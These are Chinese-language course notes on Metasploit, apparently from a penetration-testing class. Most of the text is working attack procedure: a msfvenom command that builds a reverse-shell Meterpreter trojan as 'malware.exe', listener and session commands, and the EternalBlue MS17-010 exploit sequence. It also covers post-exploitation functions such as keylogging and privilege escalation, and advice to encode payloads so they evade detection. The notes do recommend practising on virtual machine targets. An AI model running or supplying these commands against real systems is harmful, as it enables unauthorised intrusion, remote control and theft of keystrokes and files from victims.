Metasploit工具使用详解(中)笔记
Metasploit工具使用详解(中)笔记
目录
- 1. 木马生成与连接
- 2. 漏洞攻击流程
- 3. Metasploit模块详解
- 4. 学习方法建议
- 5. AI总结
1. 木马生成与连接
1.1 生成木马命令
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<控制端IP> LPORT=<端口> -f exe -o ~/Desktop/malware.exe
- 参数解析:
-p
:指定Payload类型(如windows/meterpreter/reverse_tcp
)LHOST
:控制端IP(接收反弹连接的IP)LPORT
:监听端口(默认4444)-f
:输出格式(exe
/raw
/python
等)-o
:输出文件路径
1.2 监听与控制流程
- 启动监听模块:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <控制端IP> set LPORT <端口> exploit
- 目标机执行木马:触发反弹连接
- 会话管理:
sessions -l
:查看活跃会话sessions -i <ID>
:进入指定会话
- 基础控制命令:
shutdown
:关闭目标机(演示导致会话终止)sysinfo
:获取系统信息
1.3 跨平台木马生成
平台 | Payload示例 | 输出格式 |
---|---|---|
Windows | windows/meterpreter/reverse_tcp | exe |
Linux | linux/x86/meterpreter/reverse_tcp | elf |
Python | python/meterpreter/reverse_tcp | py |
Android | android/meterpreter/reverse_tcp | apk |
2. 漏洞攻击流程
2.1 永恒之蓝(MS17-010)攻击演示
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <目标IP> # 必填项
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <控制端IP>
exploit
- 关键步骤:
check
:无损检测漏洞存在性(必须优先执行)- 确认目标平台兼容性(
show targets
) - 设置Payload实现反弹shell
2.2 常见问题与注意事项
- 蓝屏风险:未设置Payload直接攻击可能导致目标崩溃
- 平台限制:
- 仅支持特定Windows版本(如Win7 x64)
- 使用
show targets
确认兼容性
- 混淆必要性:生成木马时建议添加编码器(
-e
参数)绕过检测
3. Metasploit模块详解
3.1 核心工具功能
工具 | 功能 | 使用场景 |
---|---|---|
msfvenom | 生成Payload木马 | 后门创建 |
msfconsole | 主控制台 | 漏洞利用/会话管理 |
multi/handler | 监听模块 | 接收反弹连接 |
3.2 模块查询命令
# 列出所有Payload
./msfvenom --list payloads# 列出编码器
./msfvenom --list encoders# 查看模块详细信息
info exploit/windows/smb/ms17_010_eternalblue
3.3 Meterpreter进阶功能
- 文件操作:
upload
/download
- 权限提升:
getsystem
- 键盘记录:
keyscan_start
- 屏幕截图:
screenshot
4. 学习方法建议
4.1 自主探索路径
- 理解本质:分析工具底层原理(如Payload通信机制)
- 模块化学习:
- 分阶段掌握
msfvenom
、监听模块、漏洞利用
- 分阶段掌握
- 跨平台实践:
- 尝试生成不同OS的Payload(Linux/Python/Android)
- 混淆技术:研究
-e
参数与编码器(如x86/shikata_ga_nai
)
4.2 资源推荐
- 官方文档:Metasploit Framework Wiki
- 漏洞数据库:CVE Details
- 实验环境:使用虚拟机搭建靶机(避免真实环境攻击)
关键原则:明确目标(如"生成Linux木马")→ 查询模块 → 参数调试 → 结果验证
5. 总结
本课程深入解析Metasploit的实战应用,核心要点包括:
- 木马工程化:掌握
msfvenom
参数化生成跨平台Payload,重点理解LHOST/LPORT
的配置逻辑。 - 漏洞利用闭环:遵循"检测→配置→攻击"流程,强调
check
命令的必要性及目标平台兼容性验证。 - 模块化思维:通过
--list
命令系统性学习模块功能,结合info
查看技术细节。 - 学习方法论:反对机械复现操作,倡导分析通信协议、混淆原理等底层机制,推荐搭建虚拟机沙盒环境实践。